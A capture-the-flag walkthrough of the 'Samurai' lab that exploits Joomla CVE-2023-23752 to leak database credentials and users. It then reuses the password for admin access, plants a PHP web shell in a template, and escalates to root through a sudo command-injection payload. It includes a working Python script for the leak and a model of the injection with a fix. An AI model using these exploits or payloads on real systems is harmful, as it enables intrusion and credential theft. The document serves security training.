# Samurai (Easy) - Samurai

LAB LINK : [ HACKSMARTER](https://www.hacksmarter.org/courses/3b3f3073-3242-4aee-9bcd-0fb058ce4e13/take)

AUTHOR : [Streetcoder](https://www.linkedin.com/in/fadi-raad-84b16b208/)

<figure><img src="/files/OCnJ0l9yOUG40LivARMr" alt=""><figcaption></figcaption></figure>

### Scanning

```
nmap -p- -vvv --min-rate 1000 10.1.152.184

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 62
80/tcp open  http    syn-ack ttl 62
```

```
nmap -p22,80 -sC -sV 10.1.152.184
```

<figure><img src="/files/SMd6WW6Qaj3srnyq8uPO" alt=""><figcaption></figcaption></figure>

### Web Enumeration

* Initial browsing revealed no interesting endpoints or navigation elements on the main page.

<figure><img src="/files/S5WXaLZ6oL1EM6SOy0OC" alt=""><figcaption></figcaption></figure>

### Directory Fuzzing

```
ffuf -u http://10.1.152.184/FUZZ -w /usr/share/wordlists/dirb/common.txt -ic -ac
```

<figure><img src="/files/vWPg2Rd5cW14SyIRfxUS" alt=""><figcaption></figcaption></figure>

Found an `/administrator` endpoint, which looked interesting; visiting it revealed a Joomla CMS login page.

<figure><img src="/files/JQqzCcWY7rGLH3Crlinh" alt=""><figcaption></figcaption></figure>

Tried basic default credentials, none of which worked:

```
admin : 
admin : admin
admin : password
root  : root
root  : toor
```

#### Joomla Version Detection

Running joomscan identified the version as Joomla 4.2.5:

```
joomscan --url http://10.1.152.184/
```

<figure><img src="/files/KBdPVeiSjLCiodl1F5va" alt=""><figcaption></figcaption></figure>

The version can also be found manually, without any tooling, by fetching the manifest below.

{% hint style="info" %}
A Joomla! installation’s version can be remotely extracted without authentication by querying one of a few different endpoints
{% endhint %}

```
curl -s http://10.1.152.184/administrator/manifests/files/joomla.xml | grep -i '<version>'
```

<figure><img src="/files/Nzu0Pr2qL9ebW6hD3Qyn" alt=""><figcaption></figcaption></figure>

Searching for that Joomla version turned up an article from [VulnCheck](https://www.vulncheck.com/blog/joomla-for-rce).

Joomla 4.2.5 falls inside the affected range (4.0.0 through 4.2.7) of CVE-2023-23752, an improper access check in the web services API: appending `public=true` to a request lets an unauthenticated attacker read REST endpoints that should require a token, including the application configuration.

<figure><img src="/files/plQdQd47vaSw81MYbzBi" alt=""><figcaption></figcaption></figure>

According to the article, the configuration endpoint leaks the site's database settings, including the MySQL user and password:

```
curl -s 'http://10.1.152.184/api/index.php/v1/config/application?public=true'
```

<figure><img src="/files/foLrDwraHtcgmvGcTbdC" alt=""><figcaption></figcaption></figure>

**Extracted Credentials:**

```
└─$ curl -s 'http://10.1.152.184/api/index.php/v1/config/application?public=true' | jq . | grep -i 'user\|password'
        "user": "joomla425",
        "password": "Pa847word987@Joomla456",
```

*Note: These credentials did not work for SSH or Joomla admin panel.*

I also tried the leaked password with the usernames `admin`, `administrator` and `root`, with no luck.

Besides the **`MySQL`** credentials, the same access-check bypass (CVE-2023-23752) exposes the Joomla user list through the users endpoint:

```
curl -s 'http://10.1.152.184/api/index.php/v1/users?public=true' | jq .
```

<figure><img src="/files/dk2cac1356Y2zdDtTmvD" alt=""><figcaption></figcaption></figure>

This gives us a new username, `Miyamoto`, and we already have the database password from the config leak, so the obvious next step is to test that pair for password reuse.
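The two requests above (config and users) automated in one script, as an added example that is not part of the original write-up: it merges Joomla's one-entry-per-key config response, lists the users, and pairs every leaked username with the leaked database password for the reuse check that follows. The response shapes are assumed to follow Joomla 4's JSON:API layout, and the sample documents are constructed (the write-up's username and password, everything else invented).

```python
"""Added example (not part of the original write-up): automate the two
CVE-2023-23752 requests used above (config + users) and pair every leaked
username with the leaked database password for a password-reuse check.

Assumptions (none of this is on the original page): the response shapes follow
Joomla 4's JSON:API web-services layout, one `data` entry per config key; the
sample documents below are constructed, reusing the write-up's username and
password but with made-up values for everything else.
"""
import json
import sys
import urllib.request

CONFIG_PATH = "/api/index.php/v1/config/application?public=true"
USERS_PATH = "/api/index.php/v1/users?public=true"


def fetch_json(base_url: str, path: str, timeout: float = 10.0) -> dict:
    """GET base_url + path and decode the JSON body (live target only)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + path,
        headers={"Accept": "application/vnd.api+json", "User-Agent": "curl/8.0"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8", "replace"))


def parse_config(doc: dict) -> dict:
    """Joomla emits one `data` entry per configuration key; merge them into one dict."""
    merged = {}
    for entry in doc.get("data", []):
        merged.update(entry.get("attributes", {}))
    merged.pop("id", None)  # the application id is repeated in every entry; drop it
    return merged


def parse_users(doc: dict) -> list:
    """Return (id, username, email, group_names) for every user in a users response."""
    users = []
    for entry in doc.get("data", []):
        attrs = entry.get("attributes", {})
        users.append((str(entry.get("id")), attrs.get("username"),
                      attrs.get("email"), attrs.get("group_names", "")))
    return users


def reuse_candidates(config: dict, users: list) -> list:
    """Login pairs worth trying on /administrator: each leaked username with the DB password."""
    password = config.get("password")
    if not password:
        return []
    return [(username, password) for _, username, _, _ in users if username]


# Constructed sample responses (shape only; values other than the username and
# password taken from the write-up are invented).
SAMPLE_CONFIG = {
    "links": {"self": "http://target/api/index.php/v1/config/application"},
    "data": [
        {"type": "application", "id": "224", "attributes": {"offline": False, "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"host": "localhost", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"user": "joomla425", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"password": "Pa847word987@Joomla456", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"db": "joomla_db", "id": 224}},
    ],
}
SAMPLE_USERS = {
    "data": [
        {"type": "users", "id": "42", "attributes": {
            "id": 42, "name": "Miyamoto", "username": "Miyamoto",
            "email": "miyamoto@example.invalid", "block": 0, "group_names": "Super Users"}},
    ],
}


def main(argv: list) -> int:
    """Usage: python3 joomla_leak.py http://10.1.152.184  (no URL: run on the samples)."""
    if len(argv) > 1:
        config = parse_config(fetch_json(argv[1], CONFIG_PATH))
        users = parse_users(fetch_json(argv[1], USERS_PATH))
    else:
        config, users = parse_config(SAMPLE_CONFIG), parse_users(SAMPLE_USERS)
    for key in ("dbtype", "host", "db", "user", "password"):
        print(f"{key:>9}: {config.get(key)}")
    for uid, username, email, groups in users:
        print(f"user {uid}: {username} <{email}> [{groups}]")
    for username, password in reuse_candidates(config, users):
        print(f"try on /administrator: {username} : {password}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with the target URL as the only argument to hit a live host; without one it walks the constructed samples. The merge in `parse_config` matters because the grep on the page only works by accident of line layout: the real config is spread over many `data` entries, each carrying a single key.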

### Authenticated in Joomla

These credentials did not work over SSH, but `Miyamoto` with the leaked database password did log in to the Joomla administrator panel.

<figure><img src="/files/Jen5frXebepINVMV5sjm" alt=""><figcaption></figcaption></figure>

Navigated to **System → Site Templates → Cassiopeia Details and Files → index.php**

<figure><img src="/files/kpeRUm8N9L7W3xi4KYnD" alt=""><figcaption></figcaption></figure>

Edited `index.php`, inserted a PHP web shell, and saved the file.

<figure><img src="/files/XOlkhB6iMNudn1Rtq5x2" alt=""><figcaption></figcaption></figure>

Browsing to [templates/cassiopeia/index.php](http://10.1.152.184/templates/cassiopeia/index.php) now executes the web shell.

<figure><img src="/files/2CWqxv1tj6XpVRcvhCaG" alt=""><figcaption></figcaption></figure>

### Priv Esc | Command Injection

```
sudo -l
```

<figure><img src="/files/60PnrGZ1A961zOdbwfm9" alt=""><figcaption></figcaption></figure>

```
strings /opt/backup/DbMaria
```

<figure><img src="/files/dPFGPfCiddc8Z6R3edom" alt=""><figcaption></figcaption></figure>

**This is command injection**: the binary splices its argument into a shell command string and hands it to `system()`.

If we pass `superman; id #-- -`, the string `system()` executes becomes:

```
mariadb-dump --socket=... -u root superman; id #-- - > /tmp/backup.sql
```

The `;` terminates the dump command and runs `id`; the `#` comments out the rest of the line, including the redirection to `/tmp/backup.sql`, so the injected command's output lands on the terminal instead of the backup file. Because the binary is allowed through `sudo`, whatever we inject runs as root.

```
sudo /opt/backup/DbMaria ';id #-- '
```

<figure><img src="/files/bQOfJERd6wWU16BF3r8G" alt=""><figcaption></figcaption></figure>

```
sudo /opt/backup/DbMaria 'l1nuxkid; /bin/bash -p # --//'
```

<figure><img src="/files/Xbzn4GWjGjBGoPBoYyQq" alt=""><figcaption></figcaption></figure>
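A runnable model of the DbMaria bug next to its fix, as an added example that is not part of the original write-up. The binary's exact format string is not on the page, so the shape used here (`mariadb-dump -u root <ARG> > <file>`, socket option omitted) is an assumption; `mariadb-dump` is stood in by `echo` and the output goes to a temp file, so the demo runs harmlessly offline while exercising the same `sh -c` path that `system()` uses.

```python
"""Added example (not part of the original write-up): a Python model of the
DbMaria command injection and of the fix.  The binary's exact format string is
not on the page, so the shape below (`mariadb-dump -u root <ARG> > <file>`,
socket option omitted) is an assumption; `mariadb-dump` is replaced by `echo`
so the demo runs harmlessly offline, and the backup goes to a temp file
instead of /tmp/backup.sql.
"""
import os
import re
import shlex
import subprocess
import tempfile

# Stand-in for the real dump command; swap back to "mariadb-dump ..." on a real box.
DUMP_TOOL = "echo mariadb-dump -u root"


def _out_path(out_path):
    """Use the caller's path, or a fresh temp file (closed, so the shell can write it)."""
    if out_path:
        return out_path
    fd, path = tempfile.mkstemp(suffix=".sql")
    os.close(fd)
    return path


def build_shell_string(db_name: str, out_path: str) -> str:
    """The string the vulnerable binary hands to system(): argument spliced in verbatim."""
    return f"{DUMP_TOOL} {db_name} > {out_path}"


def vulnerable_backup(db_name: str, out_path: str = None) -> str:
    """What DbMaria does: run the spliced string through the shell, like system(3).
    Returns stdout.  On a clean run it is empty because everything is redirected
    into the backup file, so anything that shows up here came from an injected
    command whose '#' commented the redirection away."""
    cmd = build_shell_string(db_name, _out_path(out_path))
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allow-list for a MariaDB schema name.  A leading '-' cannot match, which also
# blocks option injection (e.g. "-h attacker") once the shell is out of the picture.
DB_NAME_RE = re.compile(r"[A-Za-z0-9_]{1,64}")


def is_safe_db_name(db_name: str) -> bool:
    """True only for identifiers the dump tool should ever see."""
    return DB_NAME_RE.fullmatch(db_name) is not None


def hardened_backup(db_name: str, out_path: str = None) -> str:
    """Fix: validate the name, then exec the tool with an argv list (no shell) and
    handle the redirection ourselves.  Returns what was written to the backup so
    the caller can see the argument arrived as one literal token."""
    if not is_safe_db_name(db_name):
        raise ValueError(f"rejected database name: {db_name!r}")
    path = _out_path(out_path)
    with open(path, "w") as fh:
        subprocess.run(shlex.split(DUMP_TOOL) + [db_name], stdout=fh, check=True)
    with open(path) as fh:
        return fh.read()


if __name__ == "__main__":
    payload = "; echo INJECTED #-- "   # same trick as ';id #-- ' in the write-up
    print("shell string:", build_shell_string(payload, "/tmp/backup.sql"))
    print("vulnerable  :", repr(vulnerable_backup(payload)))   # INJECTED shows up
    print("hardened    :", repr(hardened_backup("test")))
    try:
        hardened_backup(payload)
    except ValueError as exc:
        print("hardened    :", exc)
```

The allow-list is the part that matters: dropping the shell alone stops `;` and `#` from being interpreted, but an argv element such as `-h attacker` would still be parsed by the dump tool as an option, which is why the regex refuses anything that is not a plain identifier.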

